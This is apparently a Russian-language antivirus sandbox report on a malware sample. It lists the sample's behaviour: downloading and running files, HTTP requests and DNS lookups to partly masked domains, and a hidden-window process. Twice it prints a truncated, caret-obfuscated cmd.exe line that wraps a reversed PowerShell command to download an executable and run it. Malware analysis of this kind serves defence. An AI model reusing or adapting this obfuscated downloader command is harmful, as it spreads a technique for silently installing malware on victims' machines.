Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V^:^O/C"^s^e^t ^jU^8n=^ ^ ^ ^ ^ ^ ^ ^ ^ }^}{^hc^t^ac^};^ka^erb^;FvK$^ ^m^e^t^I-^e^k^ovnI^;)^Fv^K$^ ,Jl^I$(eli^Fda^o^lnwo^D.^S^zv^${yr^t{)z^Bi$ n^i^ ^Jl^I$(hc^aer^o^f;^'^ex^e.'^+Q^Q^i$+...
Сетевая активность
Подключается к
- 'mo###makeup.com':80
- 'mo###makeup.com':443
- 'cr####oadstamp.com':80
- 'cr####oadstamp.com':443
- 'nt####rte.com.br':80
- 'oo##a.biz':80
TCP
Запросы HTTP GET
- http://mo###makeup.com/k
- http://cr####oadstamp.com/0
- http://nt####rte.com.br/kl5
- http://oo##a.biz/RaQOFhRM
Другие
- 'mo###makeup.com':443
- 'cr####oadstamp.com':443
UDP
- DNS ASK mo###makeup.com
- DNS ASK cr####oadstamp.com
- DNS ASK nt####rte.com.br
- DNS ASK oo##a.biz
- DNS ASK pa###alon.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V^:^O/C"^s^e^t ^jU^8n=^ ^ ^ ^ ^ ^ ^ ^ ^ }^}{^hc^t^ac^};^ka^erb^;FvK$^ ^m^e^t^I-^e^k^ovnI^;)^Fv^K$^ ,Jl^I$(eli^Fda^o^lnwo^D.^S^zv^${yr^t{)z^Bi$ n^i^ ^Jl^I$(hc^aer^o^f;^'^ex^e.'^+Q^Q^i$+...' (со скрытым окном)
